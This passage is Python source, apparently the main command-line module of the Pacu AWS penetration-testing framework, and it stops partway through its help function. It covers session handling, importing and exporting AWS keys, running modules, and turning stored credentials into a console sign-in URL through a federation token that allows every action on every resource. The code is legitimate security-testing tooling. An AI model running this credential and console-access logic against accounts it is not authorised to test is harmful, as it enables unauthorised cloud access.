#!/usr/bin/env python3
import copy
import importlib
import json
import os
import random
import re
import shlex
import subprocess
import datetime
import sys
import time
import traceback
import argparse
from pathlib import Path
from typing import List, Optional, Any, Dict, Union, Tuple

from pacu.core import lib
from pacu.core.lib import session_dir, home_dir

try:
    import requests
    import boto3
    import botocore
    import botocore.config
    import botocore.session
    import botocore.exceptions
    import urllib.parse

    from pacu import settings

    from pacu.core.models import AWSKey, PacuSession
    from pacu.setup_database import setup_database_if_not_present
    from sqlalchemy import exc, orm  # type: ignore
    from pacu.utils import get_database_connection, set_sigint_handler
except ModuleNotFoundError:
    exception_type, exception_value, tb = sys.exc_info()
    print('Traceback (most recent call last):\n{}{}: {}\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)))
    print('Pacu was not able to start because a required Python package was not found.\nRun `sh install.sh` to check and install Pacu\'s Python requirements.')
    sys.exit(1)


def load_categories() -> set:
    categories = set()
    current_directory = os.getcwd()
    for root, directories, files in os.walk(Path(__file__).parent/'modules'):
        modules_directory_path = os.path.realpath(Path(__file__).parent/'modules')
        specific_module_directory = os.path.realpath(root)

        # Skip any directories inside module directories.
        if os.path.dirname(specific_module_directory) != modules_directory_path:
            continue
        # Skip the root directory.
        elif modules_directory_path == specific_module_directory:
            continue

        module_name = os.path.basename(root)

        for file in files:
            if file == 'main.py':
                # Make sure the format is correct
                module_path = str(Path('pacu/modules')/module_name/'main').replace('/', '.').replace('\\', '.')
                # Import the help function from the module
                module = __import__(module_path, globals(), locals(), ['module_info'], 0)
                importlib.reload(module)
                categories.add(module.module_info['category'])
    return categories


def display_pacu_help():
    print("""
    Pacu - https://github.com/RhinoSecurityLabs/pacu
    Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/

    This was built as a modular, open source tool to assist in penetration testing an AWS environment.
    For usage and developer documentation, please visit the GitHub page.

    Modules that have pre-requisites will have those listed in that modules help info, but if it is
    executed before its pre-reqs have been filled, it will prompt you to run that module then continue
    once that is finished, so you have the necessary data for the module you want to run.

    Pacu command info:
        list/ls                             List all modules
        load_commands_file <file>           Load an existing file with list of commands to execute
        search [cat[egory]] <search term>   Search the list of available modules by name or category
        help                                Display this page of information
        help <module name>                  Display information about a module
        whoami                              Display information regarding to the active access keys
        data                                Display all data that is stored in this session. Only fields
                                              with values will be displayed
        data <service>                      Display all data for a specified service in this session
        services                            Display a list of services that have collected data in the
                                              current session to use with the "data" command
        regions                             Display a list of all valid AWS regions
        update_regions                      Run a script to update the regions database to the newest
                                              version
        set_regions <region> [<region>...]  Set the default regions for this session. These space-separated
                                              regions will be used for modules where regions are required,
                                              but not supplied by the user. The default set of regions is
                                              every supported region for the service. Supply "all" to this
                                              command to reset the region set to the default of all
                                              supported regions
        run/exec <module name>              Execute a module
        set_keys                            Add a set of AWS keys to the session and set them as the
                                              default
        swap_keys                           Change the currently active AWS key to another key that has
                                              previously been set for this session
        import_keys <profile name>|--all    Import AWS keys from the AWS CLI credentials file (located
                                              at ~/.aws/credentials) to the current sessions database.
                                              Enter the name of a profile you would like to import or
                                              supply --all to import all the credentials in the file.
        export_keys                         Export the active credentials to a profile in the AWS CLI
                                              credentials file (~/.aws/credentials)
        sessions/list_sessions              List all sessions in the Pacu database
        swap_session                        Change the active Pacu session to another one in the database
        delete_session                      Delete a Pacu session from the database. Note that the output
                                              folder for that session will not be deleted

        exit/quit                           Exit Pacu

    Other command info:
        aws <command>                       Run an AWS CLI command directly. Note: If Pacu detects "aws"
                                              as the first word of the command, the whole command will
                                              instead be run in a shell so that you can use the AWS CLI
                                              from within Pacu. Due to the command running in a shell,
                                              this enables you to pipe output where needed. An example
                                              would be to run an AWS CLI command and pipe it into "jq"
                                              to parse the data returned. Warning: The AWS CLI's
                                              authentication is not related to Pacu. Be careful to
                                              ensure that you are using the keys you want when using
                                              the AWS CLI. It is suggested to use AWS CLI profiles
                                              to solve this problem
        console/open_console                Generate a URL that will log the current user/role in to
                                              the AWS web console
    """)


def import_module_by_name(module_name: str, include: List[str] = []) -> Any:  # TODO: define module type
    file_path = str(Path(__file__).parent/'modules'/module_name/'main.py')
    if os.path.exists(file_path):
        import_path = str(Path('pacu/modules')/module_name/'main').replace('/', '.').replace('\\', '.')
        module = __import__(import_path, globals(), locals(), include, 0)
        importlib.reload(module)
        return module
    return None


def get_data_from_traceback(tb) -> Tuple[Optional[PacuSession], List[str], List[str]]:
    session = None
    global_data_in_all_frames = list()
    local_data_in_all_frames = list()

    for frame, line_number in traceback.walk_tb(tb):
        global_data_in_all_frames.append(str(frame.f_globals))
        local_data_in_all_frames.append(str(frame.f_locals))

        # Save the most recent PacuSession called "session", working backwards.
        if session is None:
            session = frame.f_locals.get('session', None)
            if not isinstance(session, PacuSession):
                session = None

    return session, global_data_in_all_frames, local_data_in_all_frames


class Main:
    COMMANDS = [
        'aws', 'data', 'exec', 'exit', 'help', 'import_keys', 'list', 'load_commands_file',
        'ls', 'quit', 'regions', 'run', 'search', 'services', 'set_keys', 'set_regions',
        'swap_keys', 'update_regions', 'whoami', 'swap_session', 'sessions',
        'list_sessions', 'delete_session', 'export_keys', 'open_console', 'console'
    ]

    def __init__(self):
        # NOTE: self.database is the sqlalchemy session since 'session' is reserved for PacuSession objects.
        self.database: orm.session.Session = None
        self.running_module_names: List[str] = []
        self.CATEGORIES: set = load_categories()

        # Hack so we can use session names without passing around Main.
        lib.get_active_session = self.get_active_session

    # Utility methods
    def log_error(self, text, exception_info=None, session=None, local_data=None, global_data=None) -> None:
        """ Write an error to the file at log_file_path, or a default log file
        if no path is supplied. If a session is supplied, its name will be used
        to determine which session directory to add the error file to. """

        timestamp = time.strftime('%F %T', time.gmtime())

        if session:
            session_tag = '({})'.format(session.name)
        else:
            session_tag = '<No Session>'

        try:
            if session:
                log_file_path = '{}/error_log.txt'.format(session_dir())
            else:
                log_file_path = 'global_error_log.txt'

            print('\n[{}] Pacu encountered an error while running the previous command. Check {} for technical '
                  'details. [LOG LEVEL: {}]\n\n    {}\n'.format(timestamp, log_file_path,
                                                                settings.ERROR_LOG_VERBOSITY.upper(), exception_info))

            log_file_directory = os.path.dirname(log_file_path)
            if log_file_directory and not os.path.exists(log_file_directory):
                os.makedirs(log_file_directory)

            formatted_text = '[{}] {}: {}'.format(timestamp, session_tag, text)

            if settings.ERROR_LOG_VERBOSITY.lower() in ('low', 'high', 'extreme'):
                if session:
                    session_data = session.get_all_fields_as_dict()
                    # Empty values are not valid keys, and that info should be
                    # preserved by checking for falsiness here.
                    if session_data.get('secret_access_key'):
                        session_data['secret_access_key'] = '****** (Censored)'

                    formatted_text += 'SESSION DATA:\n    {}\n'.format(
                        json.dumps(
                            session_data,
                            indent=4,
                            default=str
                        )
                    )

            if settings.ERROR_LOG_VERBOSITY.lower() == 'high':
                if local_data is not None and global_data is not None:
                    formatted_text += '\nLAST TWO FRAMES LOCALS DATA:\n    {}\n'.format('\n\n    '.join(local_data[:2]))
                    formatted_text += '\nLAST TWO FRAMES GLOBALS DATA:\n    {}\n'.format('\n\n    '.join(global_data[:2]))

            elif settings.ERROR_LOG_VERBOSITY.lower() == 'extreme':
                if local_data is not None and global_data is not None:
                    formatted_text += '\nALL LOCALS DATA:\n    {}\n'.format('\n\n    '.join(local_data))
                    formatted_text += '\nALL GLOBALS DATA:\n    {}\n'.format('\n\n    '.join(global_data))

            formatted_text += '\n'

            with open(log_file_path, 'a+') as log_file:
                log_file.write(formatted_text)

        except Exception as error:
            print('Error while saving exception information. This means the exception was not added to any error log '
                  'and should most likely be provided to the developers.\n    Exception raised: {}'.format(str(error)))
            raise

    # @message: String - message to print and/or write to file
    # @output: String - where to output the message: both, file, or screen
    # @output_type: String - format for message when written to file: plain or xml
    # @is_cmd: boolean - Is the log the initial command that was run (True) or output (False)? Devs won't touch this most likely
    def print(self, message: Union[dict, list, str, Exception] = '', output='both', output_type='plain', is_cmd=False, session_name='') -> bool:
        session = self.get_active_session()

        if session_name == '':
            session_name = session.name

        # Indent output from a command
        if is_cmd is False:
            # Add some recursion here to go through the entire dict for
            # 'SecretAccessKey'. This is to not print the full secret access
            # key into the logs, although this should get most cases currently.
            if isinstance(message, dict):
                if 'SecretAccessKey' in message:
                    message = copy.deepcopy(message)
                    truncated_key = message['SecretAccessKey'][0:int(len(message['SecretAccessKey']) / 2)]
                    message['SecretAccessKey'] = '{}{}'.format(truncated_key, '*' * int(len(message['SecretAccessKey']) / 2))
                message = json.dumps(message, indent=2, default=str)
            elif isinstance(message, list):
                message = json.dumps(message, indent=2, default=str)

        # The next section prepends the running module's name in square
        # brackets in front of the first line in the message containing
        # non-whitespace characters.
        if len(self.running_module_names) > 0 and isinstance(message, str):
            split_message = message.split('\n')
            for index, fragment in enumerate(split_message):
                if re.sub(r'\s', '', fragment):
                    split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
                    break
            message = '\n'.join(split_message)

        if output == 'both' or output == 'file':
            if output_type == 'plain':
                with open(f'{session_dir()}/cmd_log.txt', 'a+') as text_file:
                    text_file.write('{}\n'.format(message))
            elif output_type == 'xml':
                # TODO: Implement actual XML output
                with open(f'{session_dir()}/cmd_log.xml', 'a+') as xml_file:
                    xml_file.write('{}\n'.format(message))
                pass
            else:
                print('  Unrecognized output type: {}'.format(output_type))

        if output == 'both' or output == 'screen':
            print(message)

        return True

    # @message: String - input question to ask and/or write to file
    # @output: String - where to output the message: both or screen (can't write a question to a file only)
    # @output_type: String - format for message when written to file: plain or xml
    def input(self, message, output='both', output_type='plain', session_name='') -> str:
        session = self.get_active_session()

        if session_name == '':
            session_name = session.name

        if len(self.running_module_names) > 0 and isinstance(message, str):
            split_message = message.split('\n')
            for index, fragment in enumerate(split_message):
                if re.sub(r'\s', '', fragment):
                    split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
                    break
            message = '\n'.join(split_message)

        res = input(message)
        if output == 'both':
            if output_type == 'plain':
                with open(f'{session_dir()}/cmd_log.txt', 'a+') as file:
                    file.write('{} {}\n'.format(message, res))
            elif output_type == 'xml':
                # TODO: Implement actual XML output
                # now = time.time()
                with open(f'{session_dir}/cmd_log.xml', 'a+') as file:
                    file.write('{} {}\n'.format(message, res))
            else:
                print('  Unrecognized output type: {}'.format(output_type))
        return res

    def validate_region(self, region) -> bool:
        if region in self.get_regions('All'):
            return True
        return False

    def get_regions(self, service, check_session=True) -> List[Optional[str]]:
        session = self.get_active_session()

        service = service.lower()

        with open(Path(__file__).parent/'modules/service_regions.json', 'r') as regions_file:
            regions = json.load(regions_file)

        # TODO: Add an option for GovCloud regions

        if service == 'all':
            valid_regions = regions['all']
            if 'local' in valid_regions:
                valid_regions.remove('local')
            if 'af-south-1' in valid_regions:
                valid_regions.remove('af-south-1')  # Doesn't work currently
            if 'ap-east-1' in valid_regions:
                valid_regions.remove('ap-east-1')
            if 'eu-south-1' in valid_regions:
                valid_regions.remove('eu-south-1')
            if 'me-south-1' in valid_regions:
                valid_regions.remove('me-south-1')
        if type(regions[service]) == dict and regions[service].get('endpoints'):
            if 'aws-global' in regions[service]['endpoints']:
                return [None]
            if 'all' in session.session_regions:
                valid_regions = list(regions[service]['endpoints'].keys())
                if 'local' in valid_regions:
                    valid_regions.remove('local')
                if 'af-south-1' in valid_regions:
                    valid_regions.remove('af-south-1')
                if 'ap-east-1' in valid_regions:
                    valid_regions.remove('ap-east-1')
                if 'eu-south-1' in valid_regions:
                    valid_regions.remove('eu-south-1')
                if 'me-south-1' in valid_regions:
                    valid_regions.remove('me-south-1')
                return valid_regions
            else:
                valid_regions = list(regions[service]['endpoints'].keys())
                if 'local' in valid_regions:
                    valid_regions.remove('local')
                if 'af-south-1' in valid_regions:
                    valid_regions.remove('af-south-1')
                if 'ap-east-1' in valid_regions:
                    valid_regions.remove('ap-east-1')
                if 'eu-south-1' in valid_regions:
                    valid_regions.remove('eu-south-1')
                if 'me-south-1' in valid_regions:
                    valid_regions.remove('me-south-1')
                if check_session is True:
                    return [region for region in valid_regions if region in session.session_regions]
                else:
                    return valid_regions
        else:
            if 'aws-global' in regions[service]:
                return [None]
            if 'all' in session.session_regions:
                valid_regions = regions[service]
                if 'local' in valid_regions:
                    valid_regions.remove('local')
                if 'af-south-1' in valid_regions:
                    valid_regions.remove('af-south-1')
                if 'ap-east-1' in valid_regions:
                    valid_regions.remove('ap-east-1')
                if 'eu-south-1' in valid_regions:
                    valid_regions.remove('eu-south-1')
                if 'me-south-1' in valid_regions:
                    valid_regions.remove('me-south-1')
                return valid_regions
            else:
                valid_regions = regions[service]
                if 'local' in valid_regions:
                    valid_regions.remove('local')
                if 'af-south-1' in valid_regions:
                    valid_regions.remove('af-south-1')
                if 'ap-east-1' in valid_regions:
                    valid_regions.remove('ap-east-1')
                if 'eu-south-1' in valid_regions:
                    valid_regions.remove('eu-south-1')
                if 'me-south-1' in valid_regions:
                    valid_regions.remove('me-south-1')
                if check_session is True:
                    return [region for region in valid_regions if region in session.session_regions]
                else:
                    return valid_regions

    def display_all_regions(self, command):
        for region in sorted(self.get_regions('all')):
            print('  {}'.format(region))

    # @data: list
    # @module: string
    # @args: string
    def fetch_data(self, data: List[str], module: str, args: str, force=False) -> bool:
        session = self.get_active_session()

        if data is None:
            current = None
        else:
            current = getattr(session, data[0], None)
            for item in data[1:]:
                if current is not None and item in current:
                    current = current[item]
                else:
                    current = None
                    break

        if current is None or current == '' or current == [] or current == {} or current is False:
            if force is False:
                run_prereq = self.input('Data ({}) not found, run module "{}" to fetch it? (y/n) '.format(' > '.join(data), module), session_name=session.name)
            else:
                run_prereq = 'y'
            if run_prereq == 'n':
                return False

            if args:
                self.exec_module(['exec', module] + args.split(' '))
            else:
                self.exec_module(['exec', module])
        return True

    def check_for_updates(self):
        with open(Path(__file__).parent / 'last_update.txt', 'r') as f:
            local_last_update = f.read().rstrip()

        latest_update = requests.get('https://raw.githubusercontent.com/RhinoSecurityLabs/pacu/master/last_update.txt').text.rstrip()

        local_year, local_month, local_day = local_last_update.split('-')
        datetime_local = datetime.date(int(local_year), int(local_month), int(local_day))

        latest_year, latest_month, latest_day = latest_update.split('-')
        datetime_latest = datetime.date(int(latest_year), int(latest_month), int(latest_day))

        if datetime_local < datetime_latest:
            print('Pacu has a new version available! Clone it from GitHub to receive the updates.\n    git clone '
                  'https://github.com/RhinoSecurityLabs/pacu.git\n')

    def key_info(self, alias='') -> Union[Dict[str, Any], bool]:
        """ Return the set of information stored in the session's active key
        or the session's key with a specified alias, as a dictionary. """
        session = self.get_active_session()

        if alias == '':
            alias = session.key_alias

        aws_key = self.get_aws_key_by_alias(alias)

        if aws_key is not None:
            return aws_key.get_fields_as_camel_case_dictionary()
        else:
            return False

    def print_key_info(self):
        self.print(self.key_info())

    def print_all_service_data(self, command):
        session = self.get_active_session()
        services = session.get_all_aws_data_fields_as_dict()
        for service in services.keys():
            print('  {}'.format(service))

    def install_dependencies(self, external_dependencies) -> bool:
        if len(external_dependencies) < 1:
            return True
        answer = self.input('This module requires external dependencies: {}\n\nInstall them now? (y/n) '.format(external_dependencies))
        if answer == 'n':
            self.print('Not installing dependencies, exiting...')
            return False
        self.print('\nInstalling {} total dependencies...'.format(len(external_dependencies)))
        for dependency in external_dependencies:
            split = dependency.split('/')
            name = split[-1]
            if name.split('.')[-1] == 'git':
                name = name.split('.')[0]
                author = split[-2]
                dir = session_dir()/'dependencies'/author/name
                if dir.exists():
                    self.print('  Dependency {}/{} already installed.'.format(author, name))
                else:
                    try:
                        self.print('  Installing dependency {}/{} from {}...'.format(author, name, dependency))
                        subprocess.run(['git', 'clone', dependency, dir])
                    except subprocess.CalledProcessError as error:
                        self.print('{} failed, view the error below. If you are unsure, some potential causes are '
                                   'that you are missing "git" on your command line, your git credentials are not '
                                   'properly set, or the GitHub link does not exist.'.format(error.cmd))
                        self.print('    stdout: {}\nstderr: {}'.format(error.cmd, error.stderr))
                        self.print('  Exiting module...')
                        return False
            else:
                dir = session_dir()/'dependencies'/name
                if dir.exists():
                    self.print('  Dependency {} already installed.'.format(name))
                else:
                    try:
                        self.print('  Installing dependency {}...'.format(name))
                        r = requests.get(dependency, stream=True)
                        if r.status_code == 404:
                            raise Exception('File not found.')
                        with open(dir, 'wb') as f:
                            for chunk in r.iter_content(chunk_size=1024):
                                if chunk:
                                    f.write(chunk)
                    except Exception as error:
                        self.print('    Downloading {} has failed, view the error below.'.format(dependency))
                        self.print(error)
                        self.print('  Exiting module...')

                        return False
        self.print('Dependencies finished installing.')
        return True

    def get_active_session(self) -> PacuSession:
        """ A wrapper for PacuSession.get_active_session, removing the need to
        import the PacuSession model. """
        return PacuSession.get_active_session(self.database)

    def get_aws_key_by_alias(self, alias: str) -> AWSKey:
        """ Return an AWSKey with the supplied alias that is assigned to the
        currently active PacuSession from the database, or None if no AWSKey
        with the supplied alias exists. If more than one key with the alias
        exists for the active session, an exception will be raised. """
        session = self.get_active_session()
        key = self.database.query(AWSKey) \
            .filter(AWSKey.session_id == session.id) \
            .filter(AWSKey.key_alias == alias) \
            .scalar()
        return key

    # Pacu commands and execution

    def parse_command(self, command):
        command = command.strip()

        if command.split(' ')[0] == 'aws':
            self.run_aws_cli_command(command)
            return

        try:
            command = shlex.split(command)
        except ValueError:
            self.print('  Error: Unbalanced quotes in command')
            return

        if not command or command[0] == '':
            return
        elif command[0] == 'data':
            self.parse_data_command(command)
        elif command[0] == 'sessions' or command[0] == 'list_sessions':
            self.list_sessions()
        elif command[0] == 'swap_session':
            self.check_sessions()
        elif command[0] == 'delete_session':
            self.delete_session()
        elif command[0] == 'export_keys':
            self.export_keys(command)
        elif command[0] == 'help':
            self.parse_help_command(command)
        elif command[0] == 'console' or command[0] == 'open_console':
            self.print_web_console_url()
        elif command[0] == 'import_keys':
            self.parse_awscli_keys_import(command)
        elif command[0] == 'list' or command[0] == 'ls':
            self.parse_list_command(command)
        elif command[0] == 'load_commands_file':
            self.parse_commands_from_file(command)
        elif command[0] == 'regions':
            self.display_all_regions(command)
        elif command[0] == 'run' or command[0] == 'exec':
            self.parse_exec_module_command(command)
        elif command[0] == 'search':
            self.parse_search_command(command)
        elif command[0] == 'services':
            self.print_all_service_data(command)
        elif command[0] == 'set_keys':
            self.set_keys()
        elif command[0] == 'set_regions':
            self.parse_set_regions_command(command)
        elif command[0] == 'swap_keys':
            self.swap_keys()
        elif command[0] == 'update_regions':
            self.update_regions()
        elif command[0] == 'whoami':
            self.print_key_info()
        elif command[0] == 'exit' or command[0] == 'quit':
            self.exit()
        else:
            print('  Error: Unrecognized command')
        return

    def parse_commands_from_file(self, command):
        if len(command) == 1:
            self.display_command_help('load_commands_file')
            return

        commands_file = command[1]

        if not os.path.isfile(commands_file):
            self.display_command_help('load_commands_file')
            return

        with open(commands_file, 'r+') as f:
            commands = f.readlines()
            for command in commands:
                print("Executing command: {} ...".format(command))
                command_without_space = command.strip()
                if command_without_space:
                    self.parse_command(command_without_space)

    def parse_awscli_keys_import(self, command):
        if len(command) == 1:
            self.display_command_help('import_keys')
            return

        boto3_session = boto3.session.Session()

        if command[1] == '--all':
            profiles = boto3_session.available_profiles
            for profile_name in profiles:
                self.import_awscli_key(profile_name)
            return

        self.import_awscli_key(command[1])

    def import_awscli_key(self, profile_name: str) -> None:
        try:
            boto3_session = boto3.session.Session(profile_name=profile_name)
            creds = boto3_session.get_credentials()
            self.set_keys(key_alias='imported-{}'.format(profile_name), access_key_id=creds.access_key, secret_access_key=creds.secret_key,
                          session_token=creds.token)
            self.print('  Imported keys as "imported-{}"'.format(profile_name))
        except botocore.exceptions.ProfileNotFound:
            self.print('\n  Did not find the AWS CLI profile: {}\n'.format(profile_name))
            boto3_session = boto3.session.Session()
            print('  Profiles that are available:\n    {}\n'.format('\n    '.join(boto3_session.available_profiles)))

    def run_aws_cli_command(self, command: List[str]) -> None:
        try:
            result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT).decode('utf-8')
        except subprocess.CalledProcessError as error:
            result = error.output.decode('utf-8')

        self.print(result)

    def parse_data_command(self, command: List[str]) -> None:
        session = self.get_active_session()

        if len(command) == 1:
            self.print('\nSession data:')
            session.print_all_data_in_session()
        else:
            if command[1] not in session.aws_data_field_names:
                print('  Service not found.')
            elif getattr(session, command[1]) == {} or getattr(session, command[1]) == [] or getattr(session, command[1]) == '':
                print('  No data found.')
            else:
                print(json.dumps(getattr(session, command[1]), indent=2, sort_keys=True, default=str))

    def parse_set_regions_command(self, command):
        session = self.get_active_session()

        if len(command) > 1:
            for region in command[1:]:
                if region.lower() == 'all':
                    session.update(self.database, session_regions=['all'])
                    print('  The region set for this session has been reset to the default of all supported regions.')
                    return
                if self.validate_region(region) is False:
                    print('  {} is not a valid region.\n  Session regions not changed.'.format(region))
                    return
            session.update(self.database, session_regions=command[1:])
            print('  Session regions changed: {}'.format(session.session_regions))
        else:
            print('  Error: set_regions requires either "all" or at least one region to be specified. Try the "regions" command to view all regions.')

    def parse_help_command(self, command: List[str]) -> None:
        if len(command) <= 1:
            display_pacu_help()
        elif len(command) > 1 and command[1] in self.COMMANDS:
            self.display_command_help(command[1])
        else:
            self.display_module_help(command[1])

    def parse_list_command(self, command):

        if len(command) == 1:
            self.list_modules('')

        elif len(command) == 2:
            if command[1] in ('cat', 'category', 'categories'):
                print("[Categories]:")
                for category in self.CATEGORIES:
                    print('    {}'.format(category))

        # list cat/category <cat_name>
        elif len(command) == 3:
            if command[1] in ('cat', 'category'):
                self.list_modules(command[2], by_category=True)

    def parse_exec_module_command(self, command: List[str]) -> None:
        if len(command) > 1:
            self.exec_module(command)
        else:
            print('The {} command requires a module name. Try using the module search function.'.format(command))

    def parse_search_command(self, command: List[str]) -> None:
        if len(command) == 1:
            self.list_modules('')
        elif len(command) == 2:
            self.list_modules(command[1])
        elif len(command) >= 3:
            if command[1] in ('cat', 'category'):
                self.list_modules(command[2], by_category=True)

    def update_regions(self) -> None:
        py_executable = sys.executable
        # Update botocore to fetch the latest version of the AWS region_list

        cmd = [py_executable, '-m', 'pip', 'install', '--upgrade', 'botocore']
        try:
            self.print('  Fetching latest botocore...\n')
            subprocess.run(cmd, check=True)
        except subprocess.CalledProcessError as e:
            self.print('"{}" returned {}'.format(' '.join(cmd), e.returncode))
            pip = self.input('Could not use pip3 or pip to update botocore to the latest version. Enter the name of '
                             'your pip binary to continue: ').strip()
            subprocess.run(['{}'.format(pip), 'install', '--upgrade', 'botocore'])

        path = ''

        try:
            self.print('  Using pip3 to locate botocore...\n')
            output = subprocess.check_output('{} -m pip show botocore'.format(py_executable), shell=True)
        except subprocess.CalledProcessError as e:
            self.print('Cmd: "{}" returned {}'.format(' '.join(cmd), e.returncode))
            path = self.input('Could not use pip to determine botocore\'s location. Enter the path to your Python '
                              '"dist-packages" folder (example: /usr/local/bin/python3.6/lib/dist-packages): ').strip()

        if path == '':
            # Account for Windows \r and \\ in file path (Windows)
            rows = output.decode('utf-8').replace('\r', '').replace('\\\\', '/').split('\n')
            for row in rows:
                if row.startswith('Location: '):
                    path = row.split('Location: ')[1]

        with open('{}/botocore/data/endpoints.json'.format(path), 'r+') as regions_file:
            endpoints = json.load(regions_file)

        for partition in endpoints['partitions']:
            if partition['partition'] == 'aws':
                regions = dict()
                regions['all'] = list(partition['regions'].keys())
                for service in partition['services']:
                    regions[service] = partition['services'][service]

        with open(Path(__file__).parent/'modules/service_regions.json', 'w+') as services_file:
            json.dump(regions, services_file, default=str, sort_keys=True)

        self.print('  Region list updated to the latest version!')

    def print_web_console_url(self) -> None:
        active_session = self.get_active_session()

        if not active_session.access_key_id:
            print('  No access key has been set. Not generating the URL.')
            return
        if not active_session.secret_access_key:
            print('  No secret key has been set. Not generating the URL.')
            return

        sts = self.get_boto3_client('sts')

        if active_session.session_token:
            # Roles cant use get_federation_token
            res = {
                'Credentials': {
                    'AccessKeyId': active_session.access_key_id,
                    'SecretAccessKey': active_session.secret_access_key,
                    'SessionToken': active_session.session_token
                }
            }
        else:
            res = sts.get_federation_token(  # type: ignore[attr-defined]
                Name=active_session.key_alias,
                Policy=json.dumps({
                    'Version': '2012-10-17',
                    'Statement': [
                        {
                            'Effect': 'Allow',
                            'Action': '*',
                            'Resource': '*'
                        }
                    ]
                })
            )

        params = {
            'Action': 'getSigninToken',
            'Session': json.dumps({
                'sessionId': res['Credentials']['AccessKeyId'],
                'sessionKey': res['Credentials']['SecretAccessKey'],
                'sessionToken': res['Credentials']['SessionToken']
            })
        }

        fed_resp = requests.get(url='https://signin.aws.amazon.com/federation', params=params)

        signin_token = fed_resp.json()['SigninToken']

        params = {
            'Action': 'login',
            'Issuer': active_session.key_alias or '',
            'Destination': 'https://console.aws.amazon.com/console/home',
            'SigninToken': signin_token
        }

        url = 'https://signin.aws.amazon.com/federation?' + urllib.parse.urlencode(params)

        print('Paste the following URL into a web browser to login as session {}...\n'.format(active_session.name))

        print(url)

    def all_region_prompt(self) -> bool:
        print('Automatically targeting regions:')
        for region in self.get_regions('all'):
            print('  {}'.format(region))
        response = input('Continue? (y/n) ')
        if response.lower() == 'y':
            return True
        else:
            return False

    def export_keys(self, command) -> None:
        export = input('Export the active keys to the AWS CLI credentials file (~/.aws/credentials)? (y/n) ').rstrip()

        if export.lower() == 'y':
            session = self.get_active_session()

            if not session.access_key_id:
                print('  No access key has been set. Not exporting credentials.')
                return
            if not session.secret_access_key:
                print('  No secret key has been set. Not exporting credentials.')
                return

            config = """
\n\n[{}]
aws_access_key_id = {}
aws_secret_access_key = {}
""".format(session.key_alias, session.access_key_id, session.secret_access_key)
            if session.session_token:
                config = config + 'aws_session_token = "{}"'.format(session.session_token)

            config = config + '\n'

            with open('{}/.aws/credentials'.format(os.path.expanduser('~')), 'a+') as f:
                f.write(config)

            print('Successfully exported {}. Use it with the AWS CLI like this: aws ec2 describe instances --profile {}'.format(
                session.key_alias, session.key_alias
            ))
        else:
            return

    # ***** Some module notes *****
    # For any argument that needs a value and a region for that value, use the form
    # value@region
    # Arguments that accept multiple values should be comma separated.
    #
    def exec_module(self, command: List[str]) -> None:
        session = self.get_active_session()

        # Run key checks so that if no keys have been set, Pacu doesn't default to
        # the AWSCLI default profile:
        if not session.access_key_id:
            print('  No access key has been set. Not running module.')
            return
        if not session.secret_access_key:
            print('  No secret key has been set. Not running module.')
            return

        module_name = command[1].lower()
        module = import_module_by_name(module_name, include=['main', 'module_info', 'summary'])

        if module is not None:
            # Plaintext Command Log
            self.print('{} ({}): {}'.format(session.access_key_id, time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()), ' '.join(command).strip()),
                       output='file', is_cmd=True)

            # TODO: XML Command Log - Figure out how to auto convert to XML
            # self.print('<command>{}</command>'.format(cmd), output_type='xml', output='file')

            self.print('  Running module {}...'.format(module_name))

            try:
                args = module.parser.parse_args(command[2:])
                if 'regions' in args and args.regions is None:
                    session = self.get_active_session()
                    if session.session_regions == ['all']:
                        if not self.all_region_prompt():
                            return
            except SystemExit:
                print('  Error: Invalid Arguments')
                return

            self.running_module_names.append(module.module_info['name'])
            try:
                summary_data = module.main(command[2:], self)
                # If the module's return value is None, it exited early.
                if summary_data is not None:
                    summary = module.summary(summary_data, self)
                    if len(summary) > 10000:
                        raise ValueError('The {} module\'s summary is too long ({} characters). Reduce it to 10000 '
                                         'characters or fewer.'.format(module.module_info['name'], len(summary)))

                    if not isinstance(summary, str):
                        raise TypeError('The {} module\'s summary is {}-type instead of str. Make summary return a '
                                        'string.'.format(module.module_info['name'], type(summary)))

                    self.print('{} completed.\n'.format(module.module_info['name']))
                    self.print('MODULE SUMMARY:\n\n{}\n'.format(summary.strip('\n')))
            except SystemExit as exception_value:
                exception_type, _, tb = sys.exc_info()

                if 'SIGINT called' in exception_value.args:
                    self.print('^C\nExiting the currently running module.')
                else:
                    traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(
                        ''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)
                    )
                    pacu_session, global_data, local_data = get_data_from_traceback(tb)
                    self.log_error(
                        traceback_text,
                        exception_info='{}: {}\n\nPacu caught a SystemExit error. '.format(exception_type, exception_value),
                        session=pacu_session,
                        local_data=local_data,
                        global_data=global_data
                    )
            finally:
                self.running_module_names.pop()
        elif module_name in self.COMMANDS:
            print('Error: "{}" is the name of a Pacu command, not a module. Try using it without "run" or "exec" in front.'.format(module_name))
        else:
            print('Module not found. Is it spelled correctly? Try using the module search function.')

    def display_command_help(self, command_name: str) -> None:
        if command_name == 'list' or command_name == 'ls':
            print('\n    list/ls\n        List all modules\n')
        elif command_name == 'import_keys':
            print('\n    import_keys <profile name>|--all\n      Import AWS keys from the AWS CLI credentials file (located at ~/.aws/credentials) to the '
                  'current sessions database. Enter the name of a profile you would like to import or supply --all to import all the credentials in the '
                  'file.\n')
        elif command_name == 'aws':
            print('\n    aws <command>\n        Use the AWS CLI directly. This command runs in your local shell to use the AWS CLI. Warning: The AWS CLI\'s '
                  'authentication is not related to Pacu. Be careful to ensure that you are using the keys you want when using the AWS CLI. It is suggested '
                  'to use AWS CLI profiles to help solve this problem\n')
        elif command_name == 'console' or command_name == 'open_console':
            print('\n    console/open_console\n        Generate a URL to login to the AWS web console as the current user/role\n')
        elif command_name == 'export_keys':
            print('\n    export_keys\n        Export the active credentials to a profile in the AWS CLI credentials file (~/.aws/credentials)\n')
        elif command_name == 'search':
            print('\n    search [cat[egory]] <search term>\n        Search the list of available modules by name or category\n')
        elif command_name == 'sessions' or command_name == 'list_sessions':
            print('\n    sessions/list_sessions\n        List all sessions stored in the Pacu database\n')
        elif command_name == 'swap_session':
            print('\n    swap_session\n        Swap the active Pacu session for another one stored in the database or a brand new session\n')
        elif command_name == 'delete_session':
            print('\n    delete_session\n        Delete a session from the Pacu database. Note that this does not delete the output folder for that session\n')
